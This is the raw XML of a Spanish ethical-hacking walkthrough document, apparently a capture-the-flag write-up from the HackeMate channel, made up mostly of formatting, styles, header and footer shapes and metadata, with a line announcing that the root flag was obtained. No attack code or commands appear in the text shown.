      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005A56A4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009908EE">
        <w:t xml:space="preserve"> Ahora vamos a ejecutar el script y el resultado será el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD9135E" w14:textId="3926A697" w:rsidR="009908EE" w:rsidRPr="00FA6809" w:rsidRDefault="009908EE" w:rsidP="00FA6809">
      <w:r w:rsidRPr="009908EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD1CE05" wp14:editId="57BB8F56">
            <wp:extent cx="5400040" cy="1499870"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="6826914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1494" name="Imagen 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6884" w14:textId="1985DAFA" w:rsidR="007A46D9" w:rsidRPr="007A46D9" w:rsidRDefault="007A46D9" w:rsidP="007A46D9">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ya tenemos la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> para el usuario </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A46D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A62E63" w14:textId="3CFEAEA3" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574E746A" w14:textId="773BFEC3" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D4E849" w14:textId="77777777" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE03A4C" w14:textId="77777777" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E294029" w14:textId="77777777" w:rsidR="0051639D" w:rsidRDefault="0051639D" w:rsidP="0051639D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="620E3A8C" w14:textId="528A1913" w:rsidR="00A56118" w:rsidRPr="00A56118" w:rsidRDefault="00A56118" w:rsidP="00160F61">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A56118" w:rsidRPr="00A56118">
      <w:headerReference w:type="default" r:id="rId58"/>
      <w:footerReference w:type="default" r:id="rId5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31AC48" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C2027">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="28C1304C" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C2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 Serif Shaded">
    <w:panose1 w:val="04000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="decorative"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000003" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Times Sans Serif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Grandview">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002C7" w:usb1="00000002" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Sans Serif Collection">
    <w:panose1 w:val="020B0502040504020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="8007A0C3" w:usb1="02006040" w:usb2="29100001" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Selawik Semibold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F4B6C7" w14:textId="464CC48F" w:rsidR="00424318" w:rsidRDefault="001D0525">
    <w:pPr>
      <w:pStyle w:val="Piedepgina"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r w:rsidRPr="00206A93">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:sz w:val="50"/>
        <w:szCs w:val="5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D568BD" wp14:editId="6651F8C9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>73872</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7543800" cy="704850"/>
              <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
              <wp:wrapNone/>
              <wp:docPr id="1223538465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43800" cy="70485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6CA9DB4" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00A56118" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                          <w:pPr>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                              <w:lang w:val="es-ES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AB91055" wp14:editId="28B49447">
                                <wp:extent cx="270934" cy="187375"/>
                                <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                                <wp:docPr id="1448789777" name="Imagen 1448789777" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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54267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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 flipV="1">
                                          <a:off x="0" y="0"/>
                                          <a:ext cx="283210" cy="19586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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                            <w:t xml:space="preserve">  </w:t>
                          </w:r>
                          <w:r w:rsidRPr="00A56118">
                            <w:rPr>
                              <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                              <w:sz w:val="36"/>
                              <w:szCs w:val="36"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                            <w:t>Para más contenido visita mi canal de YouTube: HackeMate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D568BD" id="_x0000_s1044" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:5.8pt;width:594pt;height:55.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/nfAIAAFgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtv2zAMvg/YfxB0X21nydoFdYqgRYcB&#10;RRu0HXpWZKkWIIuapMTOfv0o+ZGgK3YYdrFJkfz45uVV12iyF84rMCUtznJKhOFQKfNa0h/Pt58u&#10;KPGBmYppMKKkB+Hp1erjh8vWLsUMatCVcARBjF+2tqR1CHaZZZ7XomH+DKwwKJTgGhaQda9Z5ViL&#10;6I3OZnn+JWvBVdYBF97j600vpKuEL6Xg4UFKLwLRJcXYQvq69N3Gb7a6ZMtXx2yt+BAG+4coGqYM&#10;Op2gblhgZOfUH1CN4g48yHDGoclASsVFygGzKfI32TzVzIqUCxbH26lM/v/B8vv9k904LENr/dIj&#10;GbPopGviH+MjXSrWYSqW6ALh+Hi+mH++yLGmHGXn+fxikaqZHa2t8+GbgIZEoqQOm5FqxPZ3PqBH&#10;VB1VojMPWlW3SuvExAEQ19qRPcPWha6IrUKLE63sGHKiwkGLaKvNo5BEVRjkLDlM03QEY5wLE4pe&#10;VLNK9D6KRY7pDF5G98lnAozIEqObsAeAUbMHGbF7mEE/moo0jJNx/rfAeuPJInkGEybjRhlw7wFo&#10;zGrw3Otj+CeliWToth3WBnc1asaXLVSHjSMO+uXwlt8qbNgd82HDHG4D9hg3PDzgR2poSwoDRUkN&#10;7td771EfhxSllLS4XSX1P3fMCUr0d4Pj+7WYz+M6Jma+OJ8h404l21OJ2TXXgFNQ4C2xPJFRP+iR&#10;lA6aFzwE6+gVRcxw9F1SHtzIXId+6/GUcLFeJzVcQcvCnXmyPILHOseBfO5emLPD1Aac93sYN5Et&#10;3wxvrxstDax3AaRKk32s69ABXN80SsOpiffhlE9ax4O4+g0AAP//AwBQSwMEFAAGAAgAAAAhAGtc&#10;jV3cAAAACAEAAA8AAABkcnMvZG93bnJldi54bWxMj0Frg0AQhe+F/odlCr01q1JErGuohRB6MTQJ&#10;9LpxJypxZ8XdGPvvOzm1t5n3hjffK9aLHcSMk+8dKYhXEQikxpmeWgXHw+YlA+GDJqMHR6jgBz2s&#10;y8eHQufG3egL531oBYeQz7WCLoQxl9I3HVrtV25EYu/sJqsDr1MrzaRvHG4HmURRKq3uiT90esSP&#10;DpvL/moVVHVcTa9zjcm2Pm7C93bXfFY7pZ6flvc3EAGX8HcMd3xGh5KZTu5KxotBARcJrMYpiLsb&#10;ZxkrJ56SJAVZFvJ/gfIXAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAA&#10;CwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAE28f53wCAABYBQAA&#10;DgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAa1yNXdwAAAAI&#10;AQAADwAAAAAAAAAAAAAAAADWBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAN8FAAAA&#10;AA==&#10;" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="16CA9DB4" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00A56118" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES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7AB91055" wp14:editId="28B49447">
                          <wp:extent cx="270934" cy="187375"/>
                          <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                          <wp:docPr id="1448789777" name="Imagen 1448789777" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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54267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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 flipV="1">
                                    <a:off x="0" y="0"/>
                                    <a:ext cx="283210" cy="1958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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                      <w:t xml:space="preserve">  </w:t>
                    </w:r>
                    <w:r w:rsidRPr="00A56118">
                      <w:rPr>
                        <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                        <w:sz w:val="36"/>
                        <w:szCs w:val="36"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                      <w:t>Para más contenido visita mi canal de YouTube: HackeMate</w:t>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap anchorx="page"/>
            </v:rect>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="5F6FCFAF" w14:textId="77777777" w:rsidR="00424318" w:rsidRDefault="0042431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E3D33" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C2027">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1D21A16C" w14:textId="77777777" w:rsidR="00721247" w:rsidRDefault="00721247" w:rsidP="004C20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6716D" w14:textId="5DFA490B" w:rsidR="001D0525" w:rsidRDefault="001D0525">
    <w:pPr>
      <w:pStyle w:val="Encabezado"/>
    </w:pPr>
    <w:r w:rsidRPr="00206A93">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:noProof/>
        <w:sz w:val="50"/>
        <w:szCs w:val="5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08C771C" wp14:editId="140D370A">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:align>left</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-449368</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7543800" cy="501614"/>
              <wp:effectExtent l="0" t="0" r="19050" b="13335"/>
              <wp:wrapNone/>
              <wp:docPr id="1014992381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43800" cy="50161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0C53FA8" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                          <w:pPr>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                              <w:lang w:val="es-ES"/>
                            </w:rPr>
                            <w:t>Introducción al Hacking Ético</w:t>
                          </w:r>
                        </w:p>
                        <w:p w14:paraId="1A27D305" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                          <w:pPr>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                              <w:sz w:val="48"/>
                              <w:szCs w:val="48"/>
                              <w:lang w:val="es-E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08C771C" id="_x0000_s1043" style="position:absolute;margin-left:0;margin-top:-35.4pt;width:594pt;height:39.5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q3jdgIAAFEFAAAOAAAAZHJzL2Uyb0RvYy54bWysVMFu2zAMvQ/YPwi6r7azpO2COkWQIsOA&#10;oi3aDj0rslQLkEVNUmJnXz9KdpysK3YYdpEpk3wkn0heXXeNJjvhvAJT0uIsp0QYDpUyryX9/rz+&#10;dEmJD8xUTIMRJd0LT68XHz9ctXYuJlCDroQjCGL8vLUlrUOw8yzzvBYN82dghUGlBNewgFf3mlWO&#10;tYje6GyS5+dZC66yDrjwHv/e9Eq6SPhSCh7upfQiEF1SzC2k06VzE89sccXmr47ZWvEhDfYPWTRM&#10;GQw6Qt2wwMjWqT+gGsUdeJDhjEOTgZSKi1QDVlPkb6p5qpkVqRYkx9uRJv//YPnd7sk+OKShtX7u&#10;UYxVdNI18Yv5kS6RtR/JEl0gHH9ezKafL3PklKNulhfnxTSymR29rfPhq4CGRKGkDh8jccR2tz70&#10;pgeTGMyDVtVaaZ0usQHESjuyY/h0oSsG8BOr7JhyksJei+irzaOQRFWY5CQFTN10BGOcCxOKXlWz&#10;SvQxilmO5fR5jR6poAQYkSVmN2IPAL8nesDuYQb76CpSM47O+d8S651HjxQZTBidG2XAvQegsaoh&#10;cm+P6Z9QE8XQbTo0ieIGqv2DIw76qfCWrxW+1C3z4YE5HAN8XBztcI+H1NCWFAaJkhrcz/f+R3vs&#10;TtRS0uJYldT/2DInKNHfDPbtl2I6jXOYLtPZxQQv7lSzOdWYbbMCfP4Cl4jlSYz2QR9E6aB5wQ2w&#10;jFFRxQzH2CXlwR0uq9CPO+4QLpbLZIazZ1m4NU+WR/BIcOzE5+6FOTu0a8BGv4PDCLL5m67tbaOn&#10;geU2gFSppY+8DtTj3KYeGnZMXAyn92R13ISLXwAAAP//AwBQSwMEFAAGAAgAAAAhAGxncADcAAAA&#10;BwEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C/2EZwVu7SRANMZtihFK8pFgLXrfZMQlm&#10;Z8PuNo3/3ulJj2/e8N73ys1iRzGjD4MjBek6AYHUOjNQp+D4sV3lIELUZPToCBX8YIBNdXtT6sK4&#10;C73jfIid4BAKhVbQxzgVUoa2R6vD2k1I7H05b3Vk6TtpvL5wuB1lliSP0uqBuKHXE7722H4fzlZB&#10;3aS1f5gbzHbNcRs/d/v2rd4rdX+3vDyDiLjEv2e44jM6VMx0cmcyQYwKeEhUsHpKeMDVTvOcTycF&#10;eQayKuV//uoXAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAWf6t43YCAABRBQAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAbGdwANwAAAAHAQAADwAA&#10;AAAAAAAAAAAAAADQBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANkFAAAAAA==&#10;" fillcolor="black [3213]" strokecolor="#09101d [484]" strokeweight="1pt">
              <v:textbox>
                <w:txbxContent>
                  <w:p w14:paraId="30C53FA8" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                        <w:sz w:val="48"/>
                        <w:szCs w:val="48"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                        <w:sz w:val="48"/>
                        <w:szCs w:val="48"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                      <w:t>Introducción al Hacking Ético</w:t>
                    </w:r>
                  </w:p>
                  <w:p w14:paraId="1A27D305" w14:textId="77777777" w:rsidR="001D0525" w:rsidRPr="00C6799C" w:rsidRDefault="001D0525" w:rsidP="001D0525">
                    <w:pPr>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Grandview" w:hAnsi="Grandview" w:cs="Sans Serif Collection"/>
                        <w:sz w:val="48"/>
                        <w:szCs w:val="48"/>
                        <w:lang w:val="es-ES"/>
                      </w:rPr>
                    </w:pPr>
                  </w:p>
                </w:txbxContent>
              </v:textbox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46BED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="51300CBA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8E70B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B9CD8DE"/>
    <w:lvl w:ilvl="0" w:tplc="2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31A6A5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2BE0BE8"/>
    <w:lvl w:ilvl="0" w:tplc="523E71FA">
      <w:start w:val="10"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="107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 w16cid:durableId="1942759056">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="834225110">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="8561217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027"/>
    <w:rsid w:val="0002707D"/>
    <w:rsid w:val="00087C7E"/>
    <w:rsid w:val="000C007C"/>
    <w:rsid w:val="00160F61"/>
    <w:rsid w:val="00173B51"/>
    <w:rsid w:val="001D0525"/>
    <w:rsid w:val="00206A93"/>
    <w:rsid w:val="00274609"/>
    <w:rsid w:val="002952EF"/>
    <w:rsid w:val="002B1519"/>
    <w:rsid w:val="00424318"/>
    <w:rsid w:val="00440990"/>
    <w:rsid w:val="0046412D"/>
    <w:rsid w:val="004A5B45"/>
    <w:rsid w:val="004B0955"/>
    <w:rsid w:val="004C2027"/>
    <w:rsid w:val="004D731F"/>
    <w:rsid w:val="0051639D"/>
    <w:rsid w:val="00577C2D"/>
    <w:rsid w:val="0058283C"/>
    <w:rsid w:val="005A56A4"/>
    <w:rsid w:val="005E1098"/>
    <w:rsid w:val="005F268B"/>
    <w:rsid w:val="00611C6B"/>
    <w:rsid w:val="006450C7"/>
    <w:rsid w:val="00661DF7"/>
    <w:rsid w:val="00663D49"/>
    <w:rsid w:val="00697D45"/>
    <w:rsid w:val="006E2852"/>
    <w:rsid w:val="006E2B5B"/>
    <w:rsid w:val="006F0C4E"/>
    <w:rsid w:val="006F5791"/>
    <w:rsid w:val="006F6DC0"/>
    <w:rsid w:val="00721247"/>
    <w:rsid w:val="007313E7"/>
    <w:rsid w:val="00763684"/>
    <w:rsid w:val="007659EE"/>
    <w:rsid w:val="00795925"/>
    <w:rsid w:val="007A24E7"/>
    <w:rsid w:val="007A46D9"/>
    <w:rsid w:val="007D0216"/>
    <w:rsid w:val="007D5522"/>
    <w:rsid w:val="0087161E"/>
    <w:rsid w:val="008B5FA3"/>
    <w:rsid w:val="008F15EB"/>
    <w:rsid w:val="008F4187"/>
    <w:rsid w:val="00923356"/>
    <w:rsid w:val="009452D8"/>
    <w:rsid w:val="009908EE"/>
    <w:rsid w:val="009C3289"/>
    <w:rsid w:val="00A24C53"/>
    <w:rsid w:val="00A47772"/>
    <w:rsid w:val="00A51054"/>
    <w:rsid w:val="00A56118"/>
    <w:rsid w:val="00A6207F"/>
    <w:rsid w:val="00A91712"/>
    <w:rsid w:val="00A95022"/>
    <w:rsid w:val="00AB7425"/>
    <w:rsid w:val="00AF0C43"/>
    <w:rsid w:val="00AF7D65"/>
    <w:rsid w:val="00B07C54"/>
    <w:rsid w:val="00B20ED4"/>
    <w:rsid w:val="00B27B15"/>
    <w:rsid w:val="00BA4552"/>
    <w:rsid w:val="00BA520F"/>
    <w:rsid w:val="00C0138E"/>
    <w:rsid w:val="00C4061D"/>
    <w:rsid w:val="00C6799C"/>
    <w:rsid w:val="00C7172F"/>
    <w:rsid w:val="00CA0FE8"/>
    <w:rsid w:val="00CF4921"/>
    <w:rsid w:val="00D2645F"/>
    <w:rsid w:val="00D41F0F"/>
    <w:rsid w:val="00DA3052"/>
    <w:rsid w:val="00E3587F"/>
    <w:rsid w:val="00E53B6E"/>
    <w:rsid w:val="00EC0C62"/>
    <w:rsid w:val="00ED18EF"/>
    <w:rsid w:val="00EF35DB"/>
    <w:rsid w:val="00F02BA7"/>
    <w:rsid w:val="00F5411F"/>
    <w:rsid w:val="00F71477"/>
    <w:rsid w:val="00FA6809"/>
    <w:rsid w:val="00FB6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E85452"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C4D86E70-E32B-40C6-AB25-92E738BA0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68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0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C2027"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Piedepgina">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PiedepginaCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004C20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027"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Car">
    <w:name w:val="Título 1 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FA68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B5FA3"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:lang w:eastAsia="es-PE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B5FA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B5FA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8283C"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="t-14">
    <w:name w:val="t-14"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A917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PE"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Prrafodelista">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00C406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9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806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4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51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facebook.com/hackemateperu/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.instagram.com/hackemate.pe/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto3.wdp"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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linkedin.com/in/gianpaul-custodio-chavarr&#237;a" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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4.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31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https://www.youtube.com/@HackeMate" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.facebook.com/hackemateperu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22.png"/><Relationship Id="rId48" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto6.wdp"/><Relationship Id="rId56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hyperlink" Target="https://www.instagram.com/hackemate.pe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footer" Target="footer1.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/@HackeMate" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/xxe" TargetMode="External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linkedin.com/in/gianpaul-custodio-chavarr&#237;a" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId28" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto4.wdp"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16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microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto1.wdp"/><Relationship Id="rId31" Type="http://schemas.microsoft.com/office/2007/relationships/hdphoto" Target="media/hdphoto5.wdp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1DCDAB-DFBB-40CE-BDC6-9B41E1BF8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1491</TotalTime>
  <Pages>1</Pages>
  <Words>1045</Words>
  <Characters>5748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e202211050 (Custodio Chavarria, Gianpaul Jesus)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>e202211050 (Custodio Chavarria, Gianpaul Jesus)</cp:lastModifiedBy>
  <cp:revision>69</cp:revision>
  <cp:lastPrinted>2023-07-03T21:26:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-06-28T03:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-03T21:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>